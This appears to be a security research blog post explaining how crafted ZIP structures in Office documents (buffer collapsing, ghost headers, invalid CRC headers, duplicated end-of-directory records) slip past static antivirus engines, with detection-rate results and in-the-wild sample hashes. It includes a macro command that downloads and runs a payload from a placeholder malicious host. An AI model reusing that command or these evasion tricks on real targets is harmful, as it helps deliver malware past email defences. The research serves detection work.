Static engines became a standard in automatic detection for large enterprises thanks to their accurate and quick detection. When looking at detection of email attacks on enterprise organizations, they make 91% of all cyber attack attempts. If an attacker can find a way to infiltrate the organization’s defenses, the organization will become compromised the potential damage can be of millions of dollars.

Today, most email file attachments are documents, such as Microsoft Office Word or Excel documents and more (docx, xlsx, xlsm, etc…). Most new Microsoft Office files have a special structure but in reality they are just a ZIP compressed file containing the document media structure and text.
Because all of these files are candidates for attack vectors on organizations, detection engines must be able to parse these files correctly to detect exploitation attempts and attacks on enterprises.

In this blog post I will cover ways to exploit security vendors static detection engines, focusing on ZIP file format, the ways it is parsed, how can different parsers fail to detect malicious contents, and the ways attackers can potentially bypass detection engines and infiltrate the organization. Finally, I will provide an in the wild example of attack exploiting such techniques.

Basics

Before we dive deeply into technical details, let’s first understand the basics of the ZIP file format. I will not cover all ZIP file structure in the scope of this blog post, the focus would be on files content parsing, and the way it can be exploited. Here is HEX snippet of a simple ZIP file, containing 2 different files, file1 and file2. Each part beginning with PK is a start of a header of a new section. For simplicity and readability reasons, no compression was used in these files (Compression method Store)

RED: File Header entry of file `file2`
GREEN: File Header entry of file `file1`
BLUE: Central Directory File Header of `file2`
ORANGE: Central Directory File Header of `file1`
Rest of the data is closing of PK file format

Each Local File Header contains metadata about the file, such as filename, data length, compression methods and more. After the metadata information, the actual file content can be seen. For example on the first file header entry:

BLUE: Metadata
RED: File name
GREEN: File content
More information about the file format can be found on wikipedia.

File buffers collapsing

Some engines are parsing files using the Central Directory File Header, and some are walking on each of the File Headers that are present, one after the other. Calculating the size of each Local File Header is simple, in order to do so, add the known header size, to file name length, and content length. This way you can go through all file headers until reaching the Central Directory File Header. Another method, is to simply search for the Directory File Header Magic, which is 0x02014B50.

Let’s examine the Central Directory File Header hexdump:

In red, the offset from the beginning of the file can be seen. Parsing ZIP files content from the Central Directory File Header Is also possible, by seeing each file’s offset.

If different engines are parsing the files differently, it is possible to insert hidden files which some parsers will be able to detect, and others will not detect these files.

Adding a crafted file header inside another file’s content. It is possible to create a file, which some parsers will detect and others won’t. A simple variant of such crafted file hexdump:

RED: The original file’s length which his original content was the letter “B” 320 (0x140) times. 
GREEN: Inside the original file’s content, a new crafted PK header was created, to include a new file with different content, and a different filename (file9). Now when adding the file and creating another Central Directory File Header at the end of the ZIP file, to point to the new crafted header as a legitimate file. Some parsers will be able to see the content of file9, while others will ignore it, and parse the original file as a whole.

The buffers collapsing attack can get more complicated, where one file can contain several other files. See illustrations as examples:

And the way the Central Directory File Header looks like:

Results of extraction of crafter zip file vary between different versions of extractors, thus effectively can bypass different engines, based on how they parse the files.

Ghost File

In the previous method, we added a crafted file between seemingly legitimate files. And by changing the Central Directory File Header content, we could point to our crafter buffer and different parsers would extract based on different content.

In this method we will attack ZIP file parsers from a different angle, instead of inserting a crafter file pointer to the Central Directory File Header, we simply add a Local File Header Record to a new file without adding a pointer to it in the Central Directory File Header. Thus some parsers who check files from the Central Directory File Header, will not see the existence of the file, while other parsers who enumerate all Local File Header will see the file.

Invalid File Header

Some engines will stop their analysis once they reach an unexpected behavior. Other parsing engines like Microsoft Office will try to do best effort to analyze the rest of the file.Adding a simple corrupted header with invalid CRC, file length set to 0xFFFF (Max value), and a short file name, which does not reach the length of 0xFFFF, causes a corrupted file header, and will mess with static engines. This is the simple hexdump Local File Header example:

Implementation example of Central Directory File Header adjusting attack

Creating a simple word with a macro to execute the following command:

powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://my_malicious.com/payload.exe '))""

Result in virus total:

Only 33/59 engines detected the file.

After simply changing the Central Directory File Header, by removing the vbaProject.bin file, the file containing all macros, the results are astonishing:

17 / 59 engines detected the malicious macro, that’s a 50% drop with a simple change to the document file. While executing in word, the malicious behavior works the same. The only change is when the file is being executed, it asks the user if he wants to recover the file:

Clicking Yes, will execute all macros regularly.

To even further change the detection, an invalid header was added to one of the Local File Headers, with bad CRC as explained earlier. Adding an invalid header reduced VirusTotal static engines to 1 detection out of 61 engines:

The file dynamic behavior remained malicious, with a powershell dropped and execute behavior.

Corrupted ZIP File, Exploiting End of Central Directory Record, Real Malware In the wild

Mimecast’s research team found in the wild attacks that changes the PE structure in a way that is causing different parsing engines to fail, while microsoft office succeeds. Regular ZIP file structure is made of several different headers.
Starting with Local File Header entries, which contain both metadata and files content. Then comes the Central Directory File Header entries, which contain the files tree information inside the ZIP file. And finally, the file is enclosed with a End of Central Directory Header entry which presents the end of the information in the ZIP file, the very last header of the ZIP file archive and how regular ZIP files end.

However, in the analyzed attack, the attacker altered the Central Directory File Header entries, to be contain invalid when parsed, followed by End of Central Directory Header entry, which would seem like the end of the ZIP file for some parsers. And following the ending header, a duplicated and corrected Central Directory File Header entries are added with a second End of Central Directory Header entry. Thus fooling the parsers who dont try to parse the rest of the headers into using the invalid data.

In the illustration below you can view the End of Central Directory header which follows by more data, which should not be there regularly. Some parsers dont try to parse and read the rest of the data coming after this header, in contrary to Microsoft Office, where the parser tries to get as much information as possible from the file.

The End of Central Directory header begins with 0x06054B50

Below you can find an explained illustration of the attack. Local File Headers are accurate and contain valid data of the files inside the zip structure, followed by a corrupted and incorrect Central Directory File Headers, with a fake ending of End of Central Directory header to make parsers end their content evaluation there. Following the End of Central Directory header, the correct Central Directory File Headers – which shows the correct content of the files is added.

In the wild samples:

  • 97a363e1829277d24dd6d212f486023f1e30d451ca4a2d7fb49de5a52bbed7ed
  • E707411036cf105d8b634e4f104f6bb1c95be8b4dcf574bdb5b2a265c6818233
  • ecb9cfea13863f38b404040da47cb85f7b7bb27641783db56e560072c824d14b